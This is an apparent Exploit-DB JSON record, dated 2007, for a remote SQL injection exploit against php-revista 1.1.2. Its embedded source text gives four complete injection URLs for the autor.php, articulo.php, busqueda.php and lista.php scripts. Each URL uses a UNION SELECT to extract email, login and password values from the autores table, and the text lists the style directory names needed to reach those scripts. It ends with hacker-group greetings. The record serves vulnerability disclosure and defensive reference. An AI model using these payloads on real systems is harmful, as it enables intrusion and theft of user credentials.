php-revista <= 1.1.2 - Multiple Remote SQL Injection Vulnerabilities

{"bulletinFamily": "exploit", "id": "EDB-ID:3538", "cvelist": [], "modified": "2007-03-21T00:00:00", "lastseen": "2016-01-31T18:43:26", "edition": 1, "sourceData": "php-revista <= 1.1.2 Remote SQL Injection Exploit\n\nFound by & contact : Cold z3ro , cold-z3ro@hotmail.com\n\nscript :\nhttp://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0\n\n\nExploits :\n==============================================================================\nHttp://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*\n==============================================================================\nHttp://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from\nautores where id =1 /*\n==============================================================================\nHttp://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*\n==============================================================================\nHttp://www.Victem.0/revista/estilo/[STYLE]/lista.php?email='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*\n==============================================================================\n\nStyles names :\n/discreet/\n/galveston/\n/mergedidea/\n/Widget_Factory/\n/Digital_Multiplex/\n==========================================================================================================================================\n---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|\n |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|\n |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|\n |The Sniper| | DearMan | |Pro Hackers| | 020 | | abdulla00 \" alz3eem\" | | The_Viper |Kof2002|\n All i know\n==========================================================================================================================================\n\n\nBig Thx For : www.4azhar.com , Viva My HomeLand Palestine\n\nPrint : Team Hell\n\n# milw0rm.com [2007-03-21]\n", "published": "2007-03-21T00:00:00", "href": "https://www.exploit-db.com/exploits/3538/", "osvdbidlist": [], "reporter": "Cold Zero", "hash": "67116bb1e473f26f8ec8960ca0467c0d4b0eb163a4a6bdfa2f38ec5659534ac4", "title": "php-revista <= 1.1.2 - Multiple Remote SQL Injection Vulnerabilities", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities. Webapps exploit for php platform", "references": [], "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/3538/", "enchantments": {"vulnersScore": 8.5}}